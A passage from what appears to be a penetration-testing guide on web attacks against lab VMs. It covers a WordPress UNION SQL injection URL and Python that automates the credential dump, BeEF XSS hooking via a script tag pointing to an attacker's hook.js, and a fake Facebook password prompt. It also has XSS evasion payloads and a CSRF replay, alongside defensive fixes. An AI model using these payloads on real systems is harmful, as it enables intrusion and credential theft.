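        if in_str and ch == "\\" and i + 1 < len(js):
            cur.append(js[i:i + 2])          # keep the escape pair intact
            i += 2
            continue
        if ch == "'":
            in_str = not in_str
        elif ch == ";" and not in_str:
            stmts.append("".join(cur).strip())
            cur = []
            i += 1
            continue
        cur.append(ch)
        i += 1
    tail = "".join(cur).strip()
    if tail:
        stmts.append(tail)
    return stmts


def injected_statements(usersearch):
    """Statements the input added beyond the two the template itself contains.
    An empty list means the input stayed inside the quoted literal."""
    baseline = len(split_statements(vulnerable_where("paul")))
    stmts = split_statements(vulnerable_where(usersearch))
    extra = len(stmts) - baseline
    return stmts[1:1 + extra] if extra > 0 else []
```

The lexer explains NoSQLMap's two hits: both payloads contribute a return statement that fires before the template's own return, so the injected expression decides the match for every document (this.a != 'WC4Uo' is true for any document without an "a" field). Rejecting quotes is not the fix; the fix is to stop passing user data into $where at all and use a field filter as in safe_filter.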


CMS - Content Management Systems 

To continue on the topic of vulnerable web applications, I am always finding different types of 
content management systems (CMS) through my penetration tests. From what I have seen, Nessus will 
pick up some of the CMS issues, but most are found through more manual testing. To help speed up 
the initial scans of CMS sites, I like to use a couple of tools, listed below. 


CMSmap Lab 

(https://github.com/Dionach/CMSmap) (Kali Linux): 

CMSmap is a vulnerability scanner written by Dionach and automates and validates issues in 
numerous CMS applications. Let’s walk through an example from initial finding to exploitation. On 
our OWASPBWA VM, there is a WordPress site on which we can test the scanner: http://[Vulnerable 
OWASPBWA IP]/wordpress/. 











172.16.151.144/wordpress 

Broken WordPress 
New Plug-ins 
April 2011 
We have just enabled the WordPress Plugin Spreadsheet v0.6 as well as MyGallery 1.2.1. Content 
should be up in a few days for that! 
Posted in Uncategorized | No Comments 

Vulnerable Wordpress Site 

CMS sites have historically had huge numbers of vulnerabilities, so let’s scan this site using 
CMSmap to see what we can find: 

• cd /opt/CMSmap 

• ./cmsmap.py -t http://[Vulnerable OWASPBWA IP]/wordpress/ 





root@kali:/opt/CMSmap# ./cmsmap.py -t http://172.16.151.144/wordpress/ 
[-] Date & Time: 19/02/2015 02:07:42 
[I] Target: http://172.16.151.144/wordpress 
[L] Website Not in HTTPS: http://172.16.151.144/wordpress 
[I] Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1 
[I] X-Powered-By: PHP/5.3.2-1ubuntu4.5 
[L] X-Frame-Options: Not Enforced 
[L] Strict-Transport-Security: Not Enforced 
[L] X-Content-Security-Policy: Not Enforced 
[I] CMS Detection: Wordpress 
[I] Wordpress Version: 2.0 
[I] Wordpress Theme: default 
[-] Searching Vulnerable Theme from ExploitDB website 
[M] EDB-ID: 36043 ... 
[M] EDB-ID: 35879 ... 
[M] EDB-ID: 35533 Date: 2014-12-15 Verified: No Title: Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability 
[M] EDB-ID: 35543 ... 
[M] EDB-ID: 35341 Date: 2014-11-24 Verified: No Title: Wordpress wpDataTables ... 
[M] EDB-ID: 10088 Date: 2009-11-10 Verified: Yes Title: WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability 
[M] EDB-ID: 9110 ... 
[M] EDB-ID: 30036 ... 
[I] wp-db-backup 
[M] EDB-ID: 30979 Date: ... Title: ... admin/edit.php backup Parameter ... 
[M] EDB-ID: 28382 Date: 2006-08-14 Verified: Yes Title: WP-DB Backup For Wordpress 1.6/1.7 Edit.PHP Directory Traversal Vulnerability 
[I] wpSS 
[M] EDB-ID: 5486 Date: 2008-04-22 Verified: Yes Title: Wordpress Plugin Spreadsheet <=0.6 - SQL Injection Vulnerability 
[I] Checking for Directory Listing Enabled ... 
[L] http://172.16.151.144/wordpress/wp-includes/ 
[L] http://172.16.151.144/wordpress/wp-content/plugins/akismet 
[L] http://172.16.151.144/wordpress/wp-content/plugins/wpSS 
[-] Date & Time: 19/02/2015 02:08:42 
[-] Completed in: 0:00:59 
root@kali:/opt/CMSmap# 

CMSMap - Scanner Results 


A lot of different findings will come up and it is really just about playing around with them to find the 
right ones to exploit. In this case, we will take one of the verified vulnerabilities: 

• [M] EDB-ID: 5486 Date: 2008-04-22 Verified: Yes Title: Wordpress Plugin 
Spreadsheet <= 0.6 - SQL Injection Vulnerability 


A quick Google search of EDB-ID: 5486 points to: 

• http://www.exploit-db.com/exploits/5486/ 

• And the exploit code looks like this: 
wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+...--&display=plain 


So this looks to be an SQL injection vulnerability that queries the database for the users, passwords, 
and emails. Let’s open a browser to this page: 





• http://172.16.151.144/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+%281=0%29+union+select+1,concat%28user_login,0x3a,user_pass,0x3a...--&display=plain 

and we see the hash of the admin account: 

admin:21232f297a57a5a743894a0e4a801fc3:admin@example.org 

WordPress Exploit 


Great-we just got the hash to the admin account, which we can crack and, if successful, connect back 
to the database or SSH into the server. 
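The EDB-5486 URL is a textbook UNION attack, and it is worth seeing the two steps it compresses: find how many columns the original SELECT returns, then use (1=0) to empty the real result and a UNION row to carry login:hash:email out through one of the text columns. Here is an added example (my own code, not the plugin, the exploit-db entry or CMSmap) that models ss_load.php against an in-memory SQLite database with constructed tables and walks both steps; the wp_ss table layout is an assumption, the hash is the MD5 of "admin" shown above, and MySQL's concat(...,0x3a,...) becomes || and char(58) in SQLite. The parameterised version alongside shows the attack failing.

```python
import sqlite3

# Constructed stand-in for the plugin's database (not the OWASPBWA instance):
# a spreadsheet table that ss_load.php reads by id, and the wp_users table the
# exploit pivots to. The hash is MD5('admin'), as in the screenshot above.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE wp_ss(id INTEGER, title TEXT, cells TEXT, owner TEXT);
INSERT INTO wp_ss VALUES (1, 'Budget', 'A1=10,B1=20', 'admin');
CREATE TABLE wp_users(user_login TEXT, user_pass TEXT, user_email TEXT);
INSERT INTO wp_users VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3', 'admin@example.org');
""")


def ss_load(ss_id):
    """Models the vulnerable ss_load.php: ss_id goes straight into the SQL."""
    sql = "SELECT id, title, cells, owner FROM wp_ss WHERE id=%s" % ss_id
    return _db.execute(sql).fetchall()


def ss_load_safe(ss_id):
    """The fix: cast the id to an integer and bind it as a parameter."""
    sql = "SELECT id, title, cells, owner FROM wp_ss WHERE id=?"
    return _db.execute(sql, (int(ss_id),)).fetchall()


def find_column_count(query, max_cols=10):
    """Step 1 of a UNION attack: grow a NULL list until the UNION stops
    erroring. The first count that works is the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            query("1 and (1=0) union select %s" % nulls)
            return n
        except sqlite3.OperationalError:
            continue
    raise ValueError("no column count up to %d worked" % max_cols)


def dump_users(query):
    """Step 2, the EDB-5486 technique: (1=0) empties the real result set and
    the UNION row carries login:hash:email in the second (text) column."""
    ncols = find_column_count(query)
    cols = ["1", "user_login||char(58)||user_pass||char(58)||user_email"]
    cols += [str(i) for i in range(3, ncols + 1)]
    payload = "1 and (1=0) union select %s from wp_users" % ",".join(cols)
    return [row[1] for row in query(payload)]


def attack_succeeds(query):
    """True if dump_users gets a credential row out through the given lookup."""
    try:
        return bool(dump_users(query))
    except (ValueError, sqlite3.OperationalError):
        return False
```

Column 2 is used because it is a text column in the plugin's output; putting the concatenated string into a column the page never renders would execute fine but show nothing, which is one reason a working injection can look like a failed one. The exploit-db payload ends the statement with a comment so that whatever the plugin appends after ss_id is ignored; the model above has nothing trailing, so no comment is needed.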


For more in-depth WordPress vulnerability scanning, look at also using WPScan 
(https://github.com/wpscanteam/wpscan): 

• cd /opt/wpscan 

• ruby ./wpscan.rb --url http://[WordPress IP]/ 

WPScan is not only a vulnerability scanner for WordPress, but also has functionality for brute-forcing 
accounts, enumerating plugins, enumerating users, and other discovery tools. 


Cross-Site Scripting (XSS) 


I can't talk about web application vulnerabilities without talking about Cross-Site Scripting (XSS). 
This is probably one of the most common vulnerabilities that I come across. XSS is an attack on the 
application's users that is caused by a lack of output encoding (and input validation) in the application. 
There are two types of XSS: reflected (non-persistent) and stored (persistent). Both allow an attacker to 
run script code in a user's browser. I am going to focus on reflected XSS, which is the more common 
type and is relatively similar to stored XSS in terms of exploitation. 


BeEF Exploitation Framework 

(http://beefproject.com/) (Kali Linux) 


The general question I get from my clients is, "How much harm can an XSS really cause?" With this 
vulnerability you have the full ability to write scripting code on the end user's browser, so anything 
that you do in JavaScript could be used against the victim. In this section, we will dive into how 
malicious you can be with an XSS attack. 













The best tool I have seen used with XSS attacks is the BeEF Exploitation Framework. If you find an 
XSS, not only can you make a victim part of your pseudo-botnet, but you can also steal the 
contents of the clipboard, redirect them to links, turn on their camera, and so much more. 

If you do find a valid XSS on a site, you will need to craft your XSS payload to utilize the BeEF 
Framework. For our XSS examples in this chapter, we are going to use an XSS that was identified 
from our initial Burp Active Scans. Let's take the example vulnerable URL: 
http://www.securepla.net/xss_example/example.php?alert=test<script>[iframe]</script>. 
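What "crafting the XSS for BeEF" amounts to is getting a script tag that loads hook.js reflected into the page, URL-encoded into the vulnerable parameter so the link survives the trip to the victim. As an added example (my own code, not the book's, not BeEF's), here is a Python model of the reflected endpoint, the hooked link, and the output encoding that fixes it. The example.php path is the one from the URL above and the hook URL is the form the BeEF banner prints; both are assumptions here, and the page template is invented for illustration.

```python
import html
from urllib.parse import urlencode, urlparse, parse_qs

# Constructed values (assumptions, not from the book): the vulnerable page from
# the example URL above and a hook URL in the form the BeEF banner prints.
VULN_PAGE = "http://www.securepla.net/xss_example/example.php"
HOOK_URL = "http://192.168.1.123:3000/hook.js"


def render_vulnerable(alert):
    """Reflects the 'alert' parameter into the page unescaped: the bug."""
    return "<html><body><p>You searched for: %s</p></body></html>" % alert


def render_fixed(alert):
    """Same page with HTML-entity encoding on output; markup in the input is
    displayed as text instead of being parsed by the browser."""
    return "<html><body><p>You searched for: %s</p></body></html>" % html.escape(alert, quote=True)


def beef_hook_payload(hook_url):
    """The script tag that loads hook.js; once it runs, the browser shows up
    as a hooked zombie in the BeEF console."""
    return '<script src="%s"></script>' % hook_url


def hooked_link(page, param, hook_url):
    """The link handed to the victim: payload URL-encoded into the parameter."""
    return page + "?" + urlencode({param: beef_hook_payload(hook_url)})


def reflected_value(link, param):
    """What the server sees for the parameter after decoding the query string."""
    return parse_qs(urlparse(link).query)[param][0]


def is_hooked(rendered_html, hook_url):
    """True when the page, as rendered, would load hook.js."""
    return beef_hook_payload(hook_url) in rendered_html
```

Use the LAN-facing hook URL from the BeEF startup output rather than 127.0.0.1, since the victim's browser has to reach it; and note that encoding on output, as in render_fixed, is the fix regardless of what filtering happens on input.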

From the Setting Up a Penetration Box section, we installed BeEF into /opt/beef. 

We are going to have to first start the BeEF service. 

Starting BeEF Commands: 

• cd /opt/beef 

• ./beef 


[15:56:16] Bind socket [imapeudora1] listening on [0.0.0.0:2000] 
[15:56:16] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha 
[15:56:16]  | Twit: @beefproject 
[15:56:16]  | Site: http://beefproject.com 
[15:56:16]  | Blog: http://blog.beefproject.com 
[15:56:16]  |_ Wiki: https://github.com/beefproject/beef/wiki 
[15:56:16] Project Creator: (@WadeAlcorn) 
[15:56:18] BeEF is loading. Wait a few seconds... 
[15:56:26] 12 extensions enabled. 
[15:56:26] 235 modules enabled. 
[15:56:26] 2 network interfaces were detected. 
[15:56:26] running on network interface: 127.0.0.1 
[15:56:26]  | Hook URL: http://127.0.0.1:3000/hook.js 
[15:56:26]  |_ UI URL: http://127.0.0.1:3000/ui/panel 
[15:56:26] running on network interface: 192.168.1.123 
[15:56:26]  | Hook URL: http://192.168.1.123:3000/hook.js 
[15:56:26]  |_ UI URL: http://192.168.1.123:3000/ui/panel 
[15:56:26] RESTful API key: da7c1c6cdcd9a677...14a4835 
[15:56:26] DNS Server: 127.0.0.1:5300 (udp) 
[15:56:26]  | Upstream Server: 8.8.8.8:53 (udp) 
[15:56:26]  |_ Upstream Server: 8.8.8.8:53 (tcp) 
[15:56:26] HTTP Proxy: http://127.0.0.1:6789 
[15:56:26] BeEF server started (press control+c to stop) 

Starting Up BeEF 


Let's log into the console UI after the BeEF server has started. As we see from the image above, the 
UI URL in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and 
go to that URL. 


[Screenshot: the BeEF Authentication page at 127.0.0.1:3000/ui/authentication] 

BeEF Login Screen 


If everything started up successfully, you will be able to log into the UI using the username “beef” and 
password “beef”. If we look at the image where we loaded BeEF via the command line, we see a 
URL for both the UI page and the hook page (Hook URL). Let's take a moment to review the hook 
page (hook.js). 


[Screenshot: the contents of 127.0.0.1:3000/hook.js, which begin with the embedded jQuery v1.10.2 source (copyright 2005, 2013 jQuery Foundation, Inc.) followed by minified BeEF hook code] 

BeEF Client Side JavaScript 


Although this JavaScript has been well obfuscated, this is the payload that will control the victim user 
and will be injected into the victim browser's page. Once injected, the browser connects back 
to your central server without the victim being aware. 

LAB - XSS on OWASPBWA 

We were able to identify an XSS via Burp or ZAP on our vulnerable web application VM 
(OWASPBWA). So, we can directly access the vulnerable XSS by connecting to our web service: 


• http://[IP_of_OWASPBWA]/owaspbricks/content-2/index.php?user=harry3a201<script>alert(1)<%2fscript>6f350 


Since we have located an XSS vulnerability on a page, we can now use BeEF to help with the 
exploitation of the end user. In our initial example, 
http://[IP_of_OWASPBWA]/owaspbricks/content-2/index.php?user=, the user variable takes any 
input and presents it to the end user. This proves that the end user does process the JavaScript code 
embedded from our query. 

[Screenshot: the Bricks content-2 page reflecting the injected alert(1)] 

Bricks - XSS 


To create a successful exploit, instead of printing an alert, we are going to craft a URL that uses 
JavaScript to include the hook.js file. It will look something like: 

• http://192.168.1.124/owaspbricks/content-2/index.php?user=harry3a201<script src=http://192.168.1.123:3000/hook.js></script> 

I was able to append the hook.js script by using the JavaScript code: 

• <script src=[URL with hook.js]></script> 


Remember that if this is done on a public site, then the URL will need to point to a public address that 
hosts the hook.js page and listening service. 


Once you trick a victim into going to that URL using Social Engineering Tactics, they will become a 
part of your XSS zombie network. Going back to our UI panel, we should now see that a victim has 
joined our server. 




[Screenshot: the BeEF UI panel at 127.0.0.1:3000/ui/panel. Under Hooked Browsers > Online Browsers the victim 192.168.1.124 is listed. The Details, Logs and Commands tabs are shown, with the Module Tree expanded to Browser (52) > Hooked Domain (24): Fingerprint Ajax, Get Cookie, Get Form Values, Get Local Storage, Get Page HREFs, Get Page HTML, Get Page and iframe..., Get Session Storage, Get Stored Credentials, Overflow Cookie Jar, Remove stuck iframe, Replace HREFs] 

BeEF Client Attacks 


With an account hooked, there are many different modules within BeEF to exploit the end user. As 
seen in the image above, you can try to steal stored credentials, get host IP information, scan hosts 
within their network, and much more. 


One of my favorite attacks is called "pretty theft" because of its simplicity. Drop down to the Social 
Engineering folder, select Pretty Theft, then configure it how you want. In this case, we will use the 
Facebook example, and hit execute. Remember that the IP for the custom logo field has to be your 
BeEF IP. This will allow the victim to grab the image from your server. 


[Screenshot: the Pretty Theft module selected under Social Engineering (21) in the Module Tree, described as "Ask the user for their username and password using a floating div". Dialog Type is set to Facebook and the Custom Logo (Generic only) field points at the BeEF server on port 3000] 

Pretty Theft Facebook Attack 


After the attack is submitted, a Facebook password prompt will pop up onto the victim's system. This 
is where you can get creative by using a popup in which your target users would most likely enter 
their information. If you are looking to gain Google accounts, there is also a Google Phishing module. 
The benefit of this client-side attack is that the ordinary-looking password prompt popup keeps the 
user unaware that they are part of this zombie network. 


[Screenshot: the hooked page on 192.168.1.124/owaspbricks/content-2/index.php?user=harry3a201<sc... showing the Facebook-style "Log in" password prompt] 

Pretty Theft Attack 


After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on 
the ID “0” will show the attacker what the victim typed into that box. This should be enough to start 
gaining some access as the user, allowing you to move laterally through the environment. 


[Screenshot: the Commands tab, Module Results History for Pretty Theft. Command result id 0, dated Fri Mar 13 2015 16:32:47, shows the captured data: answer=pwned pwned] 

Pretty Theft Results 


I hope I was able to demonstrate how powerful an XSS vulnerability can be. It is exponentially worse 
if the XSS finding was a stored XSS versus the reflective XSS example we just saw. If it had been a 
stored XSS, we most likely wouldn't even need to use social engineering tactics on the victim to go to 
the link; we would just need to wait until our code was executed by the victim’s system. 
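As an added example (my code, not code from the book or from OWASP Bricks), here is the reflection the Bricks page performs, modelled in Python beside its hardened form. The host names in it (bricks.local, HOOK_HOST_PLACEHOLDER) are placeholders and the page template is invented for the demonstration. The point is that the same `user` value becomes live markup in the vulnerable renderer and inert text in the one that encodes for each output context, with a Content-Security-Policy header as a second layer that keeps a third-party script from loading even if an encoding step is missed.

```python
"""Reflected XSS: the vulnerable echo beside its hardened form.

Added example, not from the book or OWASP Bricks. It models the Bricks
'content-2/index.php?user=' page: a server reflects the `user` query
parameter into HTML. The first renderer does so verbatim; the second
applies context-aware output encoding, so a script tag in the parameter
is rendered as inert text.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample: the shape of the hook-injection URL from the chapter,
# with placeholder hosts instead of real ones.
HOOK_PAYLOAD = '<script src=http://HOOK_HOST_PLACEHOLDER:3000/hook.js></script>'
SAMPLE_URL = 'http://bricks.local/owaspbricks/content-2/index.php?user=harry' + HOOK_PAYLOAD

# Invented page template: the value lands in HTML body text and in a URL inside an attribute.
PAGE = '<html><body><p>Hello, {user}</p><a href="/profile?user={user_attr}">profile</a></body></html>'


def user_param(url):
    """Pull the `user` query parameter out of a URL the way the PHP page reads $_GET['user']."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("user", [""])[0]


def render_vulnerable(url):
    """Reflects the parameter verbatim: whatever was put in the URL becomes markup."""
    u = user_param(url)
    return PAGE.format(user=u, user_attr=u)


def render_hardened(url):
    """Encodes for each output context.

    html.escape(quote=True) handles HTML text and also escapes quotes, and
    quote(safe="") percent-encodes the value for the URL query component.
    """
    u = user_param(url)
    return PAGE.format(user=html.escape(u, quote=True), user_attr=quote(u, safe=""))


def response_headers():
    """Defence in depth: a CSP that only allows scripts from our own origin, so even an
    escaping miss cannot load a script from another host such as a hook server."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }


def contains_live_script(body):
    """Crude check: is there an actual <script tag left in the rendered markup?"""
    return "<script" in body.lower()


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_URL))
    print(render_hardened(SAMPLE_URL))
    print(response_headers()["Content-Security-Policy"])
```

The CSP shown is a starting point; a page that legitimately needs inline scripts would use nonces or hashes rather than loosening script-src.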


Cross-Site Scripting Obfuscation 

A common problem for an attacker injecting code is that the application implements some sort of 
input validation on the vulnerable XSS fields. This means the XSS is still valid, but you don't have all 
the normal characters you need to successfully take advantage of the vulnerability. However, the 
great thing for a pentester is that these filters are usually improperly configured. 


Fortunately, since there are so many different types of ways to encode your XSS attacks, the filters 
from the input validation scripts usually fail. You really could write an entire book about how to craft 
different XSS attacks, but here are my quick and dirty tricks to get a working list of encoders. 

Crowd Sourcing 

One of my favorite methods to find a huge number of valid XSS vulnerabilities is to visit 
http://www.reddit.com/r/xss. People will post the different XSS findings they have come across on 
that sub-reddit. This is a great way to see what other types of XSS vulnerabilities people are finding. 
Scanners are good; however, they can never replace a human eye. A lot of the findings on this 
sub-reddit were not found by an automated process, but found manually. 


I created a quick script to grab and parse all the results from the crowd-sourced sub-reddit. To kick 
off your own scan: 

• cd /opt/reddit_xss/ 

• python reddit_xss.py 


[Screenshot: terminal running python reddit_xss.py from /opt/reddit_xss. The output reads:] 

[*] Reddit XSS scrape in progress 
[*] Press CTRL-C to stop. Output will be saved to output_xss.txt 

[The terminal then shows "more output_xss.txt": a list of URLs from public sites whose search and product parameters carry percent-encoded and HTML-entity-encoded script tags and style/event-handler payloads marked XSSPOSED] 

Reddit XSS Scrape 


Once completed, a file named output_xss.txt will be generated. As you will see in your output, people 
will obfuscate XSS attacks with “fromCharCode”, percent encoding, htmlentities, and other 
JavaScript commands. Now, you are armed with a good list of XSS examples (many of them still 
active) and encodings. One quick additional note is that I do not recommend you visit the vulnerable 
site with the XSS payloads, as you could be seen as attacking their website. What I wanted to do was 
show you how to generate a good list of encoding examples that might help you in your attacks. 


OWASP Cheat Sheet 

Another resource I often use is the OWASP Evasion Cheat Sheet. This is usually the first place I look 
whenever I run into an encoding problem on any of my engagements. 

The cheat sheet can be found here: 

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 


The most common XSS problems I find usually arise from length issues or the fact that the 
greater-than/less-than symbols are not allowed. Luckily, the OWASP cheat sheet has many different 
examples to get around these issues. 
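To show why the filters described above fail and what a defender has to do about it, here is an added example (my code, not the book's script and not the OWASP cheat sheet) that strips the encoding layers the chapter lists (percent-encoding, HTML entities, String.fromCharCode) before matching. The sample strings are constructed, and the marker list is illustrative rather than a complete signature set; the lesson is that a filter which matches on the raw input will miss every encoded variant, while one that canonicalizes first matches them all.

```python
"""Why a naive XSS filter fails, and what canonicalising input first buys a defender.

Added example, not from the book or the OWASP cheat sheet. It decodes the encoding
layers the chapter mentions (percent-encoding, HTML entities, String.fromCharCode)
to a canonical form before matching, which is how a WAF or input validator has to
work if it is going to match markers such as '<script' reliably.
"""
import html
import re
from urllib.parse import unquote

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+)\)", re.IGNORECASE)
# Illustrative markers only; a real filter would use a maintained rule set.
MARKERS = ("<script", "javascript:", "onerror=", "onmouseover=")


def _decode_fromcharcode(s):
    """Replace String.fromCharCode(60,115,...) with the characters it would produce."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return "".join(chr(c) for c in codes if 0 <= c < 0x110000)
    return FROMCHARCODE.sub(repl, s)


def canonicalize(value, max_rounds=5):
    """Strip encoding layers until the string stops changing (bounded, so nested
    encodings cannot make us loop forever), then lower-case for matching."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)            # %3C -> <, and %253C -> < over two rounds
        decoded = html.unescape(decoded)      # &lt; &#60; &#x3c; -> <
        decoded = _decode_fromcharcode(decoded)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def naive_filter_blocks(value):
    """The kind of filter the chapter calls 'improperly configured': literal match on raw input."""
    return any(m in value.lower() for m in MARKERS)


def canonical_filter_blocks(value):
    """Same markers, but matched after canonicalization."""
    return any(m in canonicalize(value) for m in MARKERS)


# Constructed samples modelled on the encodings seen in the reddit scrape: the same
# '<script>alert(1)</script>' idea wrapped in different encoding layers, plus a benign value.
SAMPLES = {
    "plain": "<script>alert(1)</script>",
    "percent": "%3Cscript%3Ealert(1)%3C/script%3E",
    "double_percent": "%253Cscript%253Ealert(1)%253C/script%253E",
    "named_entity": "&lt;script&gt;alert(1)&lt;/script&gt;",
    "numeric_entity": "&#60;script&#62;alert(1)&#60;/script&#62;",
    "fromcharcode": "String.fromCharCode(60,115,99,114,105,112,116,62)alert(1)",
    "mixed_case": "%3cScRiPt%3ealert(1)%3c/script%3e",
    "benign": "harry's %20 profile &amp; settings",
}


def compare_filters():
    """Return {sample name: (naive filter blocks?, canonical filter blocks?)}."""
    return {k: (naive_filter_blocks(v), canonical_filter_blocks(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, canon) in compare_filters().items():
        print(f"{name:15} naive={naive!s:5} canonical={canon}")
```

Canonicalizing before matching is only half of the defence: the application must still encode on output, because a filter that knows nothing about where the value will be rendered cannot know which characters are dangerous there.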






Cross-Site Request Forgery (CSRF) 


Cross-Site Request Forgery basically allows you to force an unwanted action onto the victim. For 
example, you send a link to someone who is currently logged into their bank account. When that 
person accesses your link, it automatically transfers money out of their account into your account. 
This happens when there is no verification process to check that the user went through the appropriate 
steps to transfer money. 


What I mean is that in order to transfer money, a user needs to log in, go to their transfer payment page, 
select the recipient and then transfer the money. When these steps are taken, a CSRF 
token is generated on each and every page as you progress through the application, and the 
previous token is verified before the next step can proceed. You can think of this as a tracking system: 
if any of those tokens are empty or wrong, the transaction does not process. 

There are many complex ways to test this, but the easiest way to manually run these tests is through 
proxying traffic. I will go through the process of making a transaction as described above and see if I 
can replay it. However, in the replay, my goal is to get the same end result without having to go 
through all of the steps, which proves that there is a CSRF vulnerability. 


Using Burp for CSRF Replay Attacks 

Let's take an example where a bank application allows transfers from one user to another. In the URL 
below, there are two parameters that are used. The first parameter is User (to whom the money will 
go). The second parameter is the dollar amount. In the case below, we successfully transferred money 
to Frank. 


What would happen if I sent this same URL to another person who was already logged into the same 
bank application? Well, if a CSRF protection were not in place, it would transfer $123.44 from the 
victim host to Frank, instantly. 


[Screenshot: browser at http://securepla.net/xss_example/bank.php?User=Frank&Dollar=123.44 showing the response "Bank Transfer Accepted For Users Frank For the Amount: $123.44"] 

CSRF Example 


To test if this is possible, we first capture the request via Burp. Make sure that your browser is still 
proxying to Burp and make the request with user 1. This should work just fine as you went through the 
proper channels to make the transfer. You should be able to log in, go to the transfer page, fill in the 
information, and submit. 


In the example below, we can go to Burp's Proxy Tab and the History to see our last requests. At the 
very bottom, we see the request for the bank transfer. We also see that there is a hook cookie, but 
nothing that looks like a CSRF token. 


[Screenshot: Burp's Proxy > History tab (Filter: Hiding CSS, image and general binary content). The last entry is the GET request to securepla.net for /xss_example/bank.php?User=Frank&Dollar=123.44. The Raw request reads:] 

GET /xss_example/bank.php?User=Frank&Dollar=123.44 HTTP/1.1 
Host: securepla.net 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 ... 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Cookie: HOOK=... (the BeEF hook cookie; value not legible in the scan) 
Connection: keep-alive 

Burp CSRF Example 


To validate this, we can actually try to repeat the request. I usually try this method because it tells me 
instantly if I can repeat requests without having to perform any additional actions. 


If you right-click anywhere in the Raw Request area, the option to "Send to Repeater" appears. 


[Screenshot: Proxy > History with the bank transfer request selected and the right-click menu open. The menu shows Send to Spider, Do an active scan, Do a passive scan, Send to Intruder (Meta+I), Send to Repeater (Meta+R), Send to Sequencer, Send to Comparer and Send to Decoder] 

Sending to Burp's Repeater 


Inside the Repeater Tab, pressing the Go button will repeat the request and the following response 
will be populated. The result in our example was that the amount was transferred again without any 
verification from the user that this request was actually intended. This is great because you could send 
that same link to every user of this bank and Frank would become an instant millionaire. 
[Screenshot: the Repeater tab after pressing Go, with the response showing the transfer accepted again] 

Executing Burp Repeater 


The application shouldn't have allowed the user to transfer money again without going through all the 
steps required to create a transfer request. Without a CSRF token, you could have an unsuspecting 
victim click on a link and have unauthorized transfers occur. If you are looking for more information 
on CSRF attacks, go to OWASP's page: 

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) 
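To make the missing check concrete, here is an added example (my code, not the book's and not securepla.net's bank.php) of the synchronizer token pattern on a toy bank: the endpoint as the chapter found it, where the session cookie alone authorizes the transfer and a replayed request goes through, beside the hardened endpoint, where a token minted by the transfer form must come back with the request and is consumed on use. User names, balances and the session store are constructed for the demonstration.

```python
"""Synchronizer-token CSRF protection for the bank-transfer flow in the chapter.

Added example (not the book's code and not securepla.net's bank.php). It models a tiny
server: a session store, a transfer endpoint with no CSRF check (replaying the captured
request succeeds, as in the Burp Repeater test) and the hardened version, where each
transfer form hands out a per-session token that must come back with the request and is
consumed on use, so a replayed or attacker-supplied request is rejected.
"""
import hmac
import secrets


class Session:
    def __init__(self, user):
        self.user = user
        self.csrf_tokens = set()   # tokens handed out by transfer forms, consumed on use


class Bank:
    def __init__(self):
        # Constructed accounts; "Frank" is the recipient from the chapter's example.
        self.balances = {"alice": 1000.00, "bob": 1000.00, "Frank": 0.00}
        self.sessions = {}          # session cookie value -> Session
        self.log = []               # (from, to, amount) for every accepted transfer

    def login(self, user):
        """Issue a session cookie; a real application would authenticate first."""
        cookie = secrets.token_urlsafe(32)
        self.sessions[cookie] = Session(user)
        return cookie

    def transfer_form(self, cookie):
        """The 'transfer payment page': mints a fresh token bound to this session."""
        token = secrets.token_urlsafe(32)
        self.sessions[cookie].csrf_tokens.add(token)
        return token

    def _do_transfer(self, sess, to, amount):
        if amount <= 0 or self.balances[sess.user] < amount:
            return "insufficient funds"
        self.balances[sess.user] -= amount
        self.balances[to] = self.balances.get(to, 0.0) + amount
        self.log.append((sess.user, to, amount))
        return "Bank Transfer Accepted"

    def transfer_vulnerable(self, cookie, to, amount):
        """bank.php as the chapter found it: the cookie alone authorizes the transfer, so any
        request the browser sends with that cookie (a replay, a link the victim clicked) goes through."""
        sess = self.sessions.get(cookie)
        if sess is None:
            return "not logged in"
        return self._do_transfer(sess, to, amount)

    def transfer_hardened(self, cookie, to, amount, csrf_token):
        """Hardened: the request must carry a token this session was given, compared in
        constant time and removed once used, so the captured request cannot be replayed."""
        sess = self.sessions.get(cookie)
        if sess is None:
            return "not logged in"
        if not isinstance(csrf_token, str) or not csrf_token.isascii():
            return "CSRF token missing or invalid"
        match = next((t for t in sess.csrf_tokens if hmac.compare_digest(t, csrf_token)), None)
        if match is None:
            return "CSRF token missing or invalid"
        sess.csrf_tokens.discard(match)
        return self._do_transfer(sess, to, amount)


def demo():
    """Replay the captured transfer against both endpoints.

    Returns (vulnerable log, hardened log, (first, replay, forged) results)."""
    bank = Bank()
    cookie = bank.login("alice")
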